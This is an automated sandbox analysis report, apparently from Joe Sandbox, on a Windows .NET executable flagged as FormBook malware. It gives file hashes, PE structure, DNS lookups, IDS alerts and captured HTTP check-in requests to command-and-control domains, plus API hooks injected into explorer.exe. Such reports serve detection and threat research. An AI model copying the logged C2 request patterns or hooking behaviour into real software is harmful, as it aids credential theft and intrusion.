            http://www.jiyu-kobo.co.jp/ | z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmp | false
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/iz7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers8z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658933536.0000000005AFF000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designersMF5z7d1ehQQQW.exe, 00000000.00000003.657764912.0000000005AFE000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.jiyu-kobo.co.jp/fz7d1ehQQQW.exe, 00000000.00000003.655831522.0000000005AD4000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.tiro.com0Kz7d1ehQQQW.exe, 00000000.00000003.655730815.0000000005B00000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/z7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpfalse
                                                          high

                                                          Contacted IPs

                                                          Public

                                                           IP | Domain | Country | ASN | ASN Name | Malicious
                                                           35.246.6.109 | td-balancer-euw2-6-109.wixdns.net | United States | 15169 | GOOGLEUS | false
                                                           34.102.136.180 | noseainsight.com | United States | 15169 | GOOGLEUS | false

                                                          General Information

                                                          Joe Sandbox Version:33.0.0 White Diamond
                                                          Analysis ID:491384
                                                          Start date:27.09.2021
                                                          Start time:14:35:54
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 12m 14s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:z7d1ehQQQW.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                           Number of new started processes analysed:20
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@7/1@3/2
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 47.4% (good quality ratio 42.1%)
                                                          • Quality average: 73.3%
                                                          • Quality standard deviation: 32.4%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.82.209.104, 20.54.110.249, 23.0.174.185, 23.0.174.200, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.50.102.62
                                                          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com, download.windowsupdate.com.edgesuite.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                           • Not all processes were analyzed, report is missing behavior information
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                           Time | Type | Description
                                                           14:36:54 | API Interceptor | 2x Sleep call for process: z7d1ehQQQW.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z7d1ehQQQW.exe.log
                                                          Process:C:\Users\user\Desktop\z7d1ehQQQW.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.355304211458859
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                          MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                          SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                          SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                          SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                          Malicious:true
                                                          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.6030295284828995
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:z7d1ehQQQW.exe
                                                          File size:685568
                                                          MD5:50568fb6133ee4ed721ee46a3c0a9e98
                                                          SHA1:4897b6f2141395071652f72d34dc3d39eb014a56
                                                          SHA256:2b1a98add215568bb5e1c333321cf0ffe98d9128fa149c4f5a07ce2922750b3e
                                                          SHA512:d5facfcf30e3e9f815f595c3af6992551d623a5592c13e7ae8df4e29e7f6401523339bf5a7835d46c80b998fdc3338530ea677f85a08c4fe16829a83879f529f
                                                          SSDEEP:12288:+11lXTqv/Q7zgVAhTQ4HzW0Ikfda+pv0va7bjndt:qDbsVdu5ID+90vMbjd
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Qa..............0..j............... ........@.. ....................................@................................

                                                          File Icon

                                                          Icon Hash:00828e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x4a88ee
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                          Time Stamp:0x61518DCF [Mon Sep 27 09:24:31 2021 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]

                                                          Data Directories

                                                           Name | Virtual Address | Virtual Size | Is in Section
                                                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa889c | 0x4f | .text
                                                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x660 | .rsrc
                                                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc | .reloc
                                                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                          Sections

                                                           Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                           .text | 0x2000 | 0xa6904 | 0xa6a00 | False | 0.752005872562 | data | 7.61448564553 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                           .rsrc | 0xaa000 | 0x660 | 0x800 | False | 0.34375 | data | 3.56461831417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                           .reloc | 0xac000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                           Name | RVA | Size | Type | Language | Country
                                                           RT_VERSION | 0xaa090 | 0x3ce | data | |
                                                           RT_MANIFEST | 0xaa470 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                          Imports

                                                           DLL | Import
                                                           mscoree.dll | _CorExeMain

                                                          Version Infos

                                                           Description | Data
                                                           Translation | 0x0000 0x04b0
                                                           LegalCopyright | Best Products All rights reserved
                                                           Assembly Version | 253.13.3.4
                                                           InternalName | FileBasedResourceGrovel.exe
                                                           FileVersion | 253.13.2.1
                                                           CompanyName | Best Products
                                                           LegalTrademarks |
                                                           Comments | Calendar ID Sorter
                                                           ProductName | CalendarId
                                                           ProductVersion | 253.13.2.1
                                                           FileDescription | CalendarId
                                                           OriginalFilename | FileBasedResourceGrovel.exe

                                                          Network Behavior

                                                          Snort IDS Alerts

                                                           Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                           09/27/21-14:38:10.694045 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49821 | 34.102.136.180 | 192.168.2.4
                                                           09/27/21-14:38:33.068380 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49822 | 80 | 192.168.2.4 | 35.246.6.109
                                                           09/27/21-14:38:33.068380 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49822 | 80 | 192.168.2.4 | 35.246.6.109
                                                           09/27/21-14:38:33.068380 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49822 | 80 | 192.168.2.4 | 35.246.6.109
                                                           09/27/21-14:38:53.983274 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49852 | 80 | 192.168.2.4 | 47.91.170.222
                                                           09/27/21-14:38:53.983274 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49852 | 80 | 192.168.2.4 | 47.91.170.222
                                                           09/27/21-14:38:53.983274 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49852 | 80 | 192.168.2.4 | 47.91.170.222

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 14:38:10.566497087 CEST | 49821 | 80 | 192.168.2.4 | 34.102.136.180
Sep 27, 2021 14:38:10.578932047 CEST | 80 | 49821 | 34.102.136.180 | 192.168.2.4
Sep 27, 2021 14:38:10.579289913 CEST | 49821 | 80 | 192.168.2.4 | 34.102.136.180
Sep 27, 2021 14:38:10.579485893 CEST | 49821 | 80 | 192.168.2.4 | 34.102.136.180
Sep 27, 2021 14:38:10.592395067 CEST | 80 | 49821 | 34.102.136.180 | 192.168.2.4
Sep 27, 2021 14:38:10.694045067 CEST | 80 | 49821 | 34.102.136.180 | 192.168.2.4
Sep 27, 2021 14:38:10.694066048 CEST | 80 | 49821 | 34.102.136.180 | 192.168.2.4
Sep 27, 2021 14:38:10.694550037 CEST | 49821 | 80 | 192.168.2.4 | 34.102.136.180
Sep 27, 2021 14:38:10.694581985 CEST | 49821 | 80 | 192.168.2.4 | 34.102.136.180
Sep 27, 2021 14:38:10.707451105 CEST | 80 | 49821 | 34.102.136.180 | 192.168.2.4
Sep 27, 2021 14:38:33.035368919 CEST | 49822 | 80 | 192.168.2.4 | 35.246.6.109
Sep 27, 2021 14:38:33.068085909 CEST | 80 | 49822 | 35.246.6.109 | 192.168.2.4
Sep 27, 2021 14:38:33.068351030 CEST | 49822 | 80 | 192.168.2.4 | 35.246.6.109
Sep 27, 2021 14:38:33.068380117 CEST | 49822 | 80 | 192.168.2.4 | 35.246.6.109
Sep 27, 2021 14:38:33.100491047 CEST | 80 | 49822 | 35.246.6.109 | 192.168.2.4
Sep 27, 2021 14:38:33.161304951 CEST | 80 | 49822 | 35.246.6.109 | 192.168.2.4
Sep 27, 2021 14:38:33.161334038 CEST | 80 | 49822 | 35.246.6.109 | 192.168.2.4
Sep 27, 2021 14:38:33.161528111 CEST | 49822 | 80 | 192.168.2.4 | 35.246.6.109
Sep 27, 2021 14:38:33.161612034 CEST | 49822 | 80 | 192.168.2.4 | 35.246.6.109
Sep 27, 2021 14:38:33.195811033 CEST | 80 | 49822 | 35.246.6.109 | 192.168.2.4

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 14:36:40.136929035 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:36:40.156522036 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:11.329107046 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:11.356400013 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:30.264050007 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:30.278074980 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:30.835949898 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:30.849351883 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:31.351696968 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:31.370544910 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:31.928380966 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:31.995811939 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:33.098720074 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:33.111721992 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:36.748505116 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:36.783879042 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:37.221718073 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:37.234687090 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:37.997941971 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:38.012214899 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:39.414196014 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:39.427916050 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:40.775157928 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:40.848000050 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:42.119669914 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:42.132577896 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:42.506829023 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:42.520287037 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:37:59.524534941 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:37:59.546118021 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:38:10.523931026 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:38:10.554481983 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:38:32.964072943 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:38:33.026504993 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:38:34.101455927 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:38:34.143057108 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:38:35.062074900 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:38:35.075623035 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Sep 27, 2021 14:38:53.311139107 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Sep 27, 2021 14:38:53.792260885 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 14:38:10.523931026 CEST | 192.168.2.4 | 8.8.8.8 | 0x9a2f | Standard query (0) | www.noseainsight.com | A (IP address) | IN (0x0001)
Sep 27, 2021 14:38:32.964072943 CEST | 192.168.2.4 | 8.8.8.8 | 0xb0ae | Standard query (0) | www.dorotajedrusik.com | A (IP address) | IN (0x0001)
Sep 27, 2021 14:38:53.311139107 CEST | 192.168.2.4 | 8.8.8.8 | 0x3b62 | Standard query (0) | www.healthyweathorganics.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 14:38:10.554481983 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a2f | No error (0) | www.noseainsight.com | noseainsight.com | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:38:10.554481983 CEST | 8.8.8.8 | 192.168.2.4 | 0x9a2f | No error (0) | noseainsight.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 27, 2021 14:38:33.026504993 CEST | 8.8.8.8 | 192.168.2.4 | 0xb0ae | No error (0) | www.dorotajedrusik.com | www39.wixdns.net | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:38:33.026504993 CEST | 8.8.8.8 | 192.168.2.4 | 0xb0ae | No error (0) | www39.wixdns.net | balancer.wixdns.net | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:38:33.026504993 CEST | 8.8.8.8 | 192.168.2.4 | 0xb0ae | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:38:33.026504993 CEST | 8.8.8.8 | 192.168.2.4 | 0xb0ae | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | - | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 14:38:33.026504993 CEST | 8.8.8.8 | 192.168.2.4 | 0xb0ae | No error (0) | td-balancer-euw2-6-109.wixdns.net | - | 35.246.6.109 | A (IP address) | IN (0x0001)
Sep 27, 2021 14:38:53.792260885 CEST | 8.8.8.8 | 192.168.2.4 | 0x3b62 | No error (0) | www.healthyweathorganics.com | - | 47.91.170.222 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.noseainsight.com
• www.dorotajedrusik.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49821 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 14:38:10.579485893 CEST | 7759 | OUT | GET /cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47 HTTP/1.1
Host: www.noseainsight.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 14:38:10.694045067 CEST | 7760 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 27 Sep 2021 12:38:10 GMT
Content-Type: text/html
Content-Length: 275
ETag: "6139ed55-113"
Via: 1.1 google
Connection: close
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49822 | 35.246.6.109 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Sep 27, 2021 14:38:33.068380117 CEST | 7762 | OUT | GET /cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad HTTP/1.1
Host: www.dorotajedrusik.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Sep 27, 2021 14:38:33.161304951 CEST | 7763 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 27 Sep 2021 12:38:33 GMT
Content-Length: 0
Connection: close
location: https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad
strict-transport-security: max-age=120
x-wix-request-id: 1632746313.084195257051119681
Age: 0
Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVg06c/s992xw2H1Lb8Cr0s7,qquldgcFrj2n046g4RNSVIYbithkq29Tk42QMl6f1yxYgeUJqUXtid+86vZww+nL,2d58ifebGbosy5xc+FRalikT1tdHuwj9E+rXAjW8B/P35A2sqaSJufFReCt4dMF+3fKEXQvQlSAkB/lstal9R2CG0kkNBHquE4+qMuMAjUE=,2UNV7KOq4oGjA5+PKsX47LzXc1eZTFhpHbyqmhw2pKBYgeUJqUXtid+86vZww+nL,YO37Gu9ywAGROWP0rn2IfgW5PRv7IKD225xALAZbAmk=,LXlT8qjS5x6WBejJA3+gBWZqev46kXM4E2cIaE690MeTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,UvY1uiXtmgas6aI2l+unv4V+sXmuE8NPLw49WzYM4E1NJqc9MWi42+zQj+YE0ChkSYblWJ1+I4NCiXX+q5JMPA==
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Server: Pepyaka/1.19.10


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEF
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEF
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x81 0x1E 0xEF
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x89 0x9E 0xEF

Statistics

Behavior


System Behavior

General

Start time: 14:36:44
Start date: 27/09/2021
Path: C:\Users\user\Desktop\z7d1ehQQQW.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\z7d1ehQQQW.exe'
Imagebase: 0x860000
File size: 685568 bytes
MD5 hash: 50568FB6133EE4ED721EE46A3C0A9E98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.676276288.0000000002BE1000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 14:36:55
Start date: 27/09/2021
Path: C:\Users\user\Desktop\z7d1ehQQQW.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\z7d1ehQQQW.exe
Imagebase: 0xe90000
File size: 685568 bytes
MD5 hash: 50568FB6133EE4ED721EE46A3C0A9E98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
